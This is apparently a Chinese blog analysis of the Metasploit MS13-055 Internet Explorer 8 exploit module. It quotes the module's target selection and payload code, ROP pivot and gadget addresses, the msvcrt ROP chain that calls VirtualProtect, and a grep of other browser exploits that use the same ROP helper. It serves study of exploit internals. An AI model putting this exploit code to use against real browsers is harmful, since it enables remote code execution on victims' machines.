ms13_055 metasploit
111 def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254
daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF sub esp, 0xFFFFD8F0
esp_align代表的汇编语句的作用是对齐esp,即栈指针。
87 def get_target(agent)
88 return target if target.name != 'Automatic'
89
90 nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
91 ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
92
93 ie_name = "IE #{ie}"
94
95 case nt
96 when '5.1'
97 os_name = 'Windows XP SP3'
98 when '6.1'
99 os_name = 'Windows 7'
100 end
101
102 targets.each do |t|
103 if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
104 return t
105 end
106 end
107
108 nil
109 end
188 def on_request_uri(cli, request)
189 agent = request.headers['User-Agent']
190 t = get_target(agent)
当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来
返回与版本相关的数据
52 'Targets' =>
53 [
54 [ 'Automatic', {} ],
55 [
56 'IE 8 on Windows XP SP3',
57 {
58 'Rop' => :msvcrt,
59 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
60 'Align' => 0x77c4d801 # add esp, 0x2c; ret
61 }
62 ],
63 [
64 'IE 8 on Windows 7',
65 {
66 'Rop' => :jre,
67 'Pivot' => 0x7c348b05, # xchg eax, esp; ret
68 'Align' => 0x7C3445F8 # add esp, 0x2c; ret
69 }
70 ]
71 ],
如果当前的系统不支持,就会返回404页面。
111 def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
123
124 p = esp_align + payload.encoded + rand_text_alpha(12000)
125 generate_rop_payload(rop_dll, p, opts)
126 end
generate_rop_payload
77 def generate_rop_payload(rop, payload, opts={})
78 nop = opts['nop'] || nil
79 badchars = opts['badchars'] || ''
80 pivot = opts['pivot'] || ''
81 target = opts['target'] || ''
82 base = opts['base'] || nil
83
84 rop = select_rop(rop, {'target'=>target, 'base'=>base})
85 # Replace the reserved words with actual gadgets
86 rop = rop.map {|e|
87 if e == :nop
88 sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
89 elsif e == :junk
90 Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
91 elsif e == :size
92 payload.length
93 elsif e == :unsafe_negate_size
94 get_unsafe_size(payload.length)
95 elsif e == :safe_negate_size
96 get_safe_size(payload.length)
97 else
98 e
99 end
100 }.pack("V*")
101
102 raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
103
104 return pivot + rop + payload
105 end
会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。
3 <rop>
4 <compatibility>
5 <target>WINDOWS XP SP2</target>
6 <target>WINDOWS XP SP3</target>
7 </compatibility>
8
9 <gadgets base="0x77c10000">
10 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
11 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
12 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
13 <gadget value="junk">JUNK</gadget>
14 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
15 <gadget offset="0x0004d9bb">Writable location</gadget>
16 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
17 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
18 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
19 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
20 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
21 <gadget value="junk">JUNK</gadget>
22 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
23 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
24 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
25 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
26 <gadget offset="0x0004d9bb">Writable location</gadget>
27 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
28 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
29 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
30 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
31 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
32 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
33 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
34 <gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
35 </gadgets>
36 </rop>
在查找Windows下Browser相关的ROP漏洞
daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148: code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130: p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194: p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135: code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77: rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78: rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147: p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153: code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65: p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178: rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207: rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153: rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136: rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98: rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112: rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248: rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250: rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182: rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144: rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519: generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133: rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137: rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125: generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120: generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97: p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186: rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197: rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108: rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85: p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189: rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193: rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207: rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217: rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274: rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202: rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398: return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143: code = generate_rop_payload('java', payload.encoded)
ms13_055 metasploit的更多相关文章
- Metasploit各版本对比
功能特性 描述 Metasploit Framework Metasploit Community Metasploit Express Metasploit Pro Pricing ...
- 关于kali2.0rolling中metasploit升级后无法启动问题的解决总结
最近在学习metasploit的使用,文中提到可以使用msfupdate命令来对metasploit的payload.exploit等进行升级,我就试了一下,没想到升级过程并不麻烦,但升级后却出现了无 ...
- [转]初探Metasploit的自动攻击
1. 科普Metasploit 以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...
- 移动安全初探:窃取微信聊天记录、Hacking Android with Metasploit
在这篇文章中我们将讨论如何获取安卓.苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制.文章比较基础.可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对 ...
- metasploit渗透初探MR.robot(一)
看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstatio ...
- metasploit用法
1.msfconsole 进入metasploit 2.help connect 查看帮助 3.msfcli -h 查看帮助 4.ms08_067_netapi O 字符命令后加“O”,查看配置 5. ...
- chapter1 渗透测试与metasploit
网络对抗技术课程学习 chapter1 渗透测试与metasploit 一.读书笔记 二.渗透测试 通过模拟恶意攻击者的技术与方法进行攻击,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响 ...
- 原创教程:《metasploit新手指南》介绍及下载
原创教程:<metasploit新手指南>介绍及下载 1.1 作者简介 这份教程并不是“玄魂工作室”原创,但是我还是要力推给大家.相比那些一连几年都在问“我怎么才能入门”的人而言,我们更欣 ...
- kali 2.0 启动metasploit服务
kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用. 在kali 2.0中启动带数据库支持的MSF方式如下: 首先启动po ...
随机推荐
- 《图解设计模式》读书笔记6-2 Chain of Responsibility模式
目录 1. 简介 2. 示例程序 类图 代码 3. 模式的角色和类图 角色 类图 4. 思路拓展 1. 简介 Chain of Responsibility模式是责任链模式,模式的核心就是转移责任.就 ...
- Javascript在ajax提交过程中页面显示加载中,请等待效果,并在提交过程中限制确定按钮防止多次提交,提交完成后,解除提交限制
加载中,请等待div: <div id="load" class="center-in-center" style="display:none; ...
- latex的资料ftp
ftp://ftp.tex.ac.uk/ctan/tex-archive/ ftp ftp.tex.ac.uk anonymous ls
- HTML段落,换行,字符实体
HTML段落,换行,字符实体 html段落 <p>标签定义一个文本段落,一个段落含有默认的上下间距,段落之间会用这种默认间距隔开,代码如下: <!DOCTYPE html> & ...
- centos 7 设置开机启动脚本
vi /etc/rc.d/rc.local 在末尾追加 sh脚本 sh脚本要提前赋予执行权限 下面是测试,开机同步北京时间 [root@commonTest bin]# vi /usr/local/b ...
- 【题解】Antisymmetry
题目大意 对于一个01字符串,如果将这个字符串0和1取反后,再将整个串反过来和原串一样,就称作“反对称”字符串.比如00001111和010101就是反对称的,1001就不是. 现在给出一个长度为N的 ...
- JAVA 实现Jacob语音播报
准备工作:下载Jar 链接:https://pan.baidu.com/s/1edskJjYrCiefVJ7l3Ul9kQ 提取码:6dg9 ---导入jar 解压jar包,将jacob.ja ...
- 2019-8-31-Latex-公式速查
title author date CreateTime categories Latex 公式速查 lindexi 2019-08-31 16:55:58 +0800 2018-05-25 16:5 ...
- 2018-11-3-如何使用-Telegram
title author date CreateTime categories 如何使用 Telegram lindexi 2018-11-03 10:12:12 +0800 2018-02-21 1 ...
- dictionary小项目代码管理
软件项目开发流程 需求分析 ----> 概要设计 ---> 项目计划 ---->详细设计--->编码测试 -----> 项目测试 ---->调试修改 ---> ...